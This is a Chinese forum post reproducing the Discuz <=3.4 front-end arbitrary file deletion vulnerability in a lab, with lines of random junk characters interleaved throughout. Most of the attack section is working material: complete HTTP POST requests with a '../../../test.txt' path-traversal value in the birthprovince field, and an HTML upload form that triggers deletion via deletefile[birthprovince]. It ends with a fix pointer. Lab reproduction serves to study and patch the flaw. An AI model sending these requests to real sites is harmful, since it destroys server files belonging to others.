|
|
6 e- ?; Z# ^7 S; D* H% V4 Q# T. K6 a
" D) d4 B% w( M8 o7 t$ t前言:9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。, D0 n: g8 A0 e! \" t$ f3 }! O; [
影响版本:Discuz < =3.4 环境
* r# R% V) j. d9 e
8 ?; z7 b) O0 O9 }% `8 S# P0 C复现过程:首先在discuz目录下新建一个test.txt文件,到时候删除用。( H# K" S' O( S. B/ t5 n1 [
新建test.txt
- {! |4 I9 D6 x4 k7 j3 L访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。
1 m6 u5 ]$ B3 F6 u0 c- l
" o @6 c9 H" _0 i, A8 W
4 C2 G9 N& t$ b( q查看formhash
, E( S8 g+ X' o2 {利用burp抓包,获取cookie
# \) g5 _) J# F
V) g) [. E* T( G1 J, f1 ?2 i% M# T |8 m; p$ {3 ?* H1 l
: ^3 B0 y* ?/ N3 I$ F
7 R4 ]4 _$ X- j% y) L. a% u, G4 W1 H" Q0 j7 u0 V
抓取cookie
# \6 a0 k7 `6 a/ P: p. o% s5 \. M; o! F8 ?+ [
发送下面数据包:修改cookie,formhash,还有删除的文件- l( Z7 |) j. o. X
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
! }0 p. E% q* r$ ~; o& FHost: localhost1 l9 v2 c/ |4 F* {4 W6 B7 D
Content-Length: 367
9 [3 P0 M+ W1 ICache-Control: max-age=0
5 T0 z7 F. G+ [3 H8 y' M# b" f TUpgrade-Insecure-Requests: 1
; M1 ~# ~ p6 W0 jContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
# K: a" }7 h3 ~- D5 U/ B0 a& M% `1 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36% T7 \) I& i( A2 J7 |, W1 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8, v! m- O( ^, v* m2 V( L7 o0 \1 M+ Z
Accept-Encoding: gzip, deflate
0 A3 |/ ` e7 u( g# e- {1 x3 L& nAccept-Language: zh-CN,zh;q=0.8,en;q=0.6
1 Y. g' f4 B5 {/ E( K0 Q( z9 PCookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056( e0 J, i# y% v H
Connection: close! ?) P& U8 V) \- }9 x% x
------WebKitFormBoundaryPFvXyxL45f34L12s
/ q/ E. S5 ]# U9 J1 J; S! W& j, tContent-Disposition: form-data; name="formhash"
+ S+ V. r) ^9 A! J! ~1 d5 c84a7f376
, j* e" p& |+ X/ z& K3 r/ n. c+ Y5 q------WebKitFormBoundaryPFvXyxL45f34L12s" u3 K9 j5 B2 ~- L. V
Content-Disposition: form-data; name="birthprovince"
* t/ Y# `5 N. P1 q1 r../../../test.txt
9 L3 F* D4 C0 c' f3 K------WebKitFormBoundaryPFvXyxL45f34L12s
7 z# N$ W* G1 f, m! X( Y) p4 UContent-Disposition: form-data; name="profilesubmit"! v( }* u5 c- x; `* P; c# ^7 F- n
1
y0 o$ X" p4 X0 H/ ?3 _------WebKitFormBoundaryPFvXyxL45f34L12s--
+ `8 h7 t% X7 P0 |% q3 a& P发送删除的数据包
$ B" Z4 S# o& ]5 [" x% n6 ]' H刷新页面,查看出生地就会显示成下图所示的状态:0 P' i+ @% N$ V- |2 B) x X
数据成功写入, t+ M; s% f8 b4 z2 k+ t5 I
7 H! } E) c7 [4 t' k% |
0 Y( l! \" N* i8 @
说明数据已经进入数据库:
# e w9 c( G% i$ A8 n- X, B然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:
2 A# j" S* C) d7 x2 M6 V: a' h<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">7 F( p" _/ y. w- _* F
<input type="file"name="birthprovince" id="file" />
+ s, Z" m4 S9 w<input type="text"name="formhash" value="84a7f376"/></p>
7 K5 q0 y M1 c9 h0 _8 o# i<input type="text"name="profilesubmit" value="1"/></p>
* w- K6 i `/ ^& {' C( k8 \7 D<input type="submit"value="Submit" />/ v& [; B2 f7 N% k4 E1 N, |
</from>; \4 m9 U* w! w( q8 a' P8 T p2 W
: U" M! u$ \! u
i" E& J$ Z5 h; ]' x! m
7 _6 S, V) d* K* A/ O7 A" T8 p6 G
. M- |7 z4 N! B# h9 y$ n& _% E7 P7 f5 p* @; q$ a
或者直接构建数据包:7 v4 @+ F8 o7 s. w5 k0 @
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
% e+ q- m& B2 e/ `Host: 192.168.220.131
. ~3 V* |% g! y- z4 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
' B. _3 \; c# l! a1 d1 [9 A% P( yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
: I& @' d! s- N" B& CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! H5 ~ `; f) F0 d- g
Accept-Encoding: gzip, deflate! ]$ s( \. K ?, |+ o( n+ O
Content-Type: multipart/form-data; boundary=---------------------------123821742118716/ I5 y2 n, i3 D M
Content-Length: 91989
. U2 Z) \+ J$ t3 y* k v" l" o& vConnection: close/ @7 Q' q0 z) m. N- _# a
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C15779380565 U5 b/ }1 s( \" N7 ~5 Q' [7 b) x+ e
Upgrade-Insecure-Requests: 1' u6 c+ U: R* [3 M: K# x
-----------------------------123821742118716; A- r) H% D+ e# `1 R( O
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
1 c/ m* d7 }! c- ~0 @Content-Type: image/jpeg
7 _4 B+ ?9 [" k1 Y- K% \' ozerba(这里写啥都可以)1 s# ]) [6 [3 F, H1 i
-----------------------------123821742118716--
' k8 Y1 j* z4 [+ ^( @, m' O: [; K- s u7 S4 s2 b
1 H* q3 C* i P2 k8 t" U, d
x/ b: }' j5 i' O. f: c& L, w
0 i4 l ]$ }# y0 a- a' F; }: m8 `( X8 ~" x1 Y
- b" ]3 V: b$ ]) h; I& c6 d2 o. E
+ A8 W. ~$ R. p, G
2 c! w- n' C: F6 L, q! P/ t% I" M& x& u+ S
) d$ \0 P% L+ I$ K+ L" M, G; W1 N- Y
9 u) |( z- D9 M$ b/ ~3 z+ S1 V
进去discuz看看,可以看到,test.txt文件已经被删除了。
( Z! ?/ H% d9 B9 t- _# n0 X
9 S( V) W9 @* U2 I; j$ _2 y' d- N }+ F' m
. S7 ], `8 ~/ q. ]5 d: @
& E# Q. Q! i) \5 T" _) T& j7 b' [/ Q$ Q
修复建议:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e5741 L- x% O* l, j9 Q o. ]
编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。
4 D1 A+ t8 S: A- [' ]
" J, A& Z" c9 j
^# _# I4 Q! c( m- z$ m) u6 P) M- l6 L
" J4 n' i& D' ?) H+ f# E/ o
# Q7 l/ ?- r1 M
9 `% ?: a9 D6 i6 e: _
1 Z: K+ p- x+ c2 J& k; H' \; ]5 Q
) c" j8 C. y' m% d. L
* T" |7 @! N7 P |
|
窥视卡
雷达卡
发表于 2022-6-25 08:59:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜